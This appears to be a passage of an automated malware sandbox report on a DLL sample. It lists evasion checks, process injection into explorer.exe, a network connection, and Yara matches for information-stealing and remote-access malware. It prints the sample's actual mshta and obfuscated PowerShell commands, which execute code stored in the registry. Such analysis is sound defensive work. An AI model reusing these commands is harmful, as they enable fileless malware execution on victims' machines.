Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\41kkxng4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cweuuamv.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5414 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4042 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000020.00000000.510384320.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000020.00000000.510434477.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USnd
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 6e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: RuntimeBroker.exe, 00000027.00000000.559967386.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so
Source: explorer.exe, 00000020.00000000.529687334.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.489068719.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.520169879.000000000340A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 146.70.35.138 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7E55912E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7E55912E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 4AC000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC86661580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC86661580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 4A8000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFC86661580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2640000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9CAA3A3000
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2640000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3968 base: 4AC000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3968 base: 7FFC86661580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3968 base: 2600000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3968 base: 7FFC86661580 value: 40 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3968 base: 4A8000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3968 base: 7FFC86661580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3968 base: 2640000 value: 80
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 720 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 86661580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 86661580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 86661580
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wefk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wefk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pDut.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iqioaqncxw -value gp; new-alias -name fchfny -value iex; fchfny ([System.Text.Encoding]::ASCII.GetString((iqioaqncxw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cweuuamv.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41kkxng4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B19.tmp" "c:\Users\user\AppData\Local\Temp\CSC9452DD6E90C74A5284F45229D37BC.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES52D7.tmp" "c:\Users\user\AppData\Local\Temp\CSCE5529B6452BD443991E7FB86A88433C.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: explorer.exe, 00000020.00000000.510397112.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.486456941.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000020.00000000.510915282.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.497881456.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.487570363.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000000.510915282.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.487570363.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.511837420.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000020.00000000.510915282.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.487570363.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.511837420.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000020.00000000.486535547.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.510434477.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000020.00000000.510915282.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.487570363.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.511837420.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_052412D3 cpuid 3_2_052412D3
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_052439B5 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep, 3_2_052439B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0524515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_0524515F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_052412D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_052412D3

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
